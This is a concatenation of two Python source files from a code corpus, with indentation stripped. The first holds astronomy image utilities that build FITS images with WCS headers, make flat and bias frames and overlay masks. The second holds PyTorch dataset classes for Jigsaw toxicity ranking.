def create_blank_image(ra_deg, dec_deg, fov_deg, px_scale, rot_deg,
cdbase=[1, 1], dtype=None, logger=None, pfx='dp',
mmap_path=None, mmap_mode='w+'):
# ra and dec in traditional format
ra_txt = wcs.raDegToString(ra_deg, format='%02d:%02d:%06.3f')
dec_txt = wcs.decDegToString(dec_deg, format='%s%02d:%02d:%05.2f')
if np.isscalar(px_scale):
px_wd_scale, px_ht_scale = (px_scale, px_scale)
else:
px_wd_scale, px_ht_scale = px_scale
# Create an empty image
if np.isscalar(fov_deg):
fov_wd_deg, fov_ht_deg = (fov_deg, fov_deg)
else:
fov_wd_deg, fov_ht_deg = fov_deg
width = int(round(fov_wd_deg / px_wd_scale))
height = int(round(fov_ht_deg / px_ht_scale))
# round to an even size
if width % 2 != 0:
width += 1
if height % 2 != 0:
height += 1
if dtype is None:
dtype = np.float32
if mmap_path is None:
data = np.zeros((height, width), dtype=dtype)
else:
data = np.memmap(mmap_path, dtype=dtype, mode=mmap_mode,
shape=(height, width))
crpix1 = float(width // 2)
crpix2 = float(height // 2)
header = OrderedDict((('SIMPLE', True),
('BITPIX', -32),
('EXTEND', True),
('NAXIS', 2),
('NAXIS1', width),
('NAXIS2', height),
('RA', ra_txt),
('DEC', dec_txt),
('EQUINOX', 2000.0),
('OBJECT', 'MOSAIC'),
('LONPOLE', 180.0),
))
# Add basic WCS keywords
wcshdr = wcs.simple_wcs(crpix1, crpix2, ra_deg, dec_deg,
(px_wd_scale, px_ht_scale),
rot_deg, cdbase=cdbase)
header.update(wcshdr)
# Create image container
image = AstroImage.AstroImage(data, logger=logger)
image.update_keywords(header)
# give the image a name
get_image_name(image, pfx=pfx)
return image
def recycle_image(image, ra_deg, dec_deg, fov_deg, px_scale, rot_deg,
cdbase=[1, 1], logger=None, pfx='dp'):
# ra and dec in traditional format
ra_txt = wcs.raDegToString(ra_deg, format='%02d:%02d:%06.3f')
dec_txt = wcs.decDegToString(dec_deg, format='%s%02d:%02d:%05.2f')
header = image.get_header()
pointing = OrderedDict((('RA', ra_txt),
('DEC', dec_txt),
))
header.update(pointing)
# Update WCS keywords and internal wcs objects
wd, ht = image.get_size()
crpix1 = wd // 2
crpix2 = ht // 2
wcshdr = wcs.simple_wcs(crpix1, crpix2, ra_deg, dec_deg, px_scale,
rot_deg, cdbase=cdbase)
header.update(wcshdr)
# this should update the wcs
image.update_keywords(header)
# zero out data array
data = image.get_data()
data.fill(0)
## # Create new image container sharing same data
## new_image = AstroImage.AstroImage(data, logger=logger)
## new_image.update_keywords(header)
## # give the image a name
## get_image_name(new_image, pfx=pfx)
new_image = image
return new_image
def make_flat(imglist, bias=None):
flats = [image.get_data() for image in imglist]
flatarr = np.array(flats)
# Take the median of the individual frames
flat = np.median(flatarr, axis=0)
# Normalize flat
# mean or median?
#norm = np.mean(flat.flat)
norm = np.median(flat.flat)
flat = flat / norm
# no zero divisors
flat[flat == 0.0] = 1.0
img_flat = make_image(flat, imglist[0], {}, pfx='flat')
return img_flat
def make_bias(imglist):
biases = [image.get_data() for image in imglist]
biasarr = np.array(biases)
# Take the median of the individual frames
bias = np.median(biasarr, axis=0)
img_bias = make_image(bias, imglist[0], {}, pfx='bias')
return img_bias
def add(image1, image2):
data1_np = image1.get_data()
data2_np = image2.get_data()
result = data1_np + data2_np
image = make_image(result, image1, {}, pfx='add')
return image
def subtract(image1, image2):
data1_np = image1.get_data()
data2_np = image2.get_data()
result = data1_np - data2_np
image = make_image(result, image1, {}, pfx='sub')
return image
def divide(image1, image2):
data1_np = image1.get_data()
data2_np = image2.get_data()
result = data1_np / data2_np
image = make_image(result, image1, {}, pfx='div')
return image
# https://gist.github.com/stscieisenhamer/25bf6287c2c724cb9cc7
def masktorgb(mask, color='lightgreen', alpha=1.0):
"""Convert boolean mask to RGB image object for canvas overlay.
Parameters
----------
mask : ndarray
Boolean mask to overlay. 2D image only.
color : str
Color name accepted by Ginga.
alpha : float
Opacity. Unmasked data are always transparent.
Returns
-------
rgbobj : RGBImage
RGB image for canvas Image object.
Raises
------
ValueError
Invalid mask dimension.
"""
mask = np.asarray(mask)
if mask.ndim != 2:
raise ValueError('ndim={0} is not supported'.format(mask.ndim))
ht, wd = mask.shape
r, g, b = colors.lookup_color(color)
rgbobj = RGBImage(data_np=np.zeros((ht, wd, 4), dtype=np.uint8))
rc = rgbobj.get_slice('R')
gc = rgbobj.get_slice('G')
bc = rgbobj.get_slice('B')
ac = rgbobj.get_slice('A')
ac[:] = 0 # Transparent background
rc[mask] = int(r * 255)
gc[mask] = int(g * 255)
bc[mask] = int(b * 255)
ac[mask] = int(alpha * 255)
# For debugging
#rgbobj.save_as_file('ztmp_rgbobj.png')
return rgbobj
def split_n(lst, sz):
n = len(lst)
k, m = n // sz, n % sz
return [lst[i * k + min(i, m):(i + 1) * k + min(i + 1, m)]
for i in range(sz)]
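# Hedged worked example: split_n(list(range(7)), 3) -> [[0, 1, 2], [3, 4], [5, 6]];
# the first (len(lst) % sz) chunks absorb one extra element each, so chunk
# sizes differ by at most one.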
# END
| 2.546875 | 3 |
jigsaw/datasets/datasets.py | alexvishnevskiy/jigsaw | 0 | 11399 | <gh_stars>0
from torch.utils.data import Dataset
from ..utils.optimal_lenght import find_optimal_lenght
class PairedDataset(Dataset):
def __init__(
self,
df,
cfg,
tokenizer,
more_toxic_col='more_toxic',
less_toxic_col='less_toxic'
):
self.df = df
self.cfg = cfg
self.tokenizer = tokenizer
self.more_toxic = df[more_toxic_col].values
self.less_toxic = df[less_toxic_col].values
self.more_toxic_max_lenght = find_optimal_lenght(
df, tokenizer, more_toxic_col, cfg.max_length
)
self.less_toxic_max_lenght = find_optimal_lenght(
df, tokenizer, less_toxic_col, cfg.max_length
)
def __len__(self):
return len(self.df)
def __getitem__(self, index):
more_toxic = self.more_toxic[index]
less_toxic = self.less_toxic[index]
inputs_more_toxic = self.tokenizer.encode_plus(
more_toxic,
truncation=True,
max_length=self.more_toxic_max_lenght,
add_special_tokens=True,
)
inputs_less_toxic = self.tokenizer.encode_plus(
less_toxic,
truncation=True,
max_length=self.less_toxic_max_lenght,
add_special_tokens=True,
)
target = 1
more_toxic_ids = inputs_more_toxic['input_ids']
more_toxic_mask = inputs_more_toxic['attention_mask']
less_toxic_ids = inputs_less_toxic['input_ids']
less_toxic_mask = inputs_less_toxic['attention_mask']
return {
'more_toxic_ids': more_toxic_ids,
'more_toxic_mask': more_toxic_mask,
'less_toxic_ids': less_toxic_ids,
'less_toxic_mask': less_toxic_mask,
'target': target
}
class RegressionDataset(Dataset):
def __init__(self, df, cfg, tokenizer, text_col, target_col = None):
self.df = df
self.cfg = cfg
self.tokenizer = tokenizer
self.X = df[text_col].values
self.target_col = target_col
self.max_lenght = find_optimal_lenght(
df, tokenizer, text_col, cfg.max_length
)
if target_col is not None:
self.y = df[target_col].values
def __len__(self):
return len(self.df)
def __getitem__(self, index):
text = self.X[index]
if self.target_col is not None:
target = self.y[index]
inputs = self.tokenizer.encode_plus(
text,
truncation=True,
max_length=self.max_lenght,
add_special_tokens=True,
)
ids = inputs['input_ids']
mask = inputs['attention_mask']
if self.target_col is not None:
return {
'input_ids': ids,
'attention_mask': mask,
'target': target
}
else:
return {
'input_ids': ids,
'attention_mask': mask
} | 2.375 | 2 |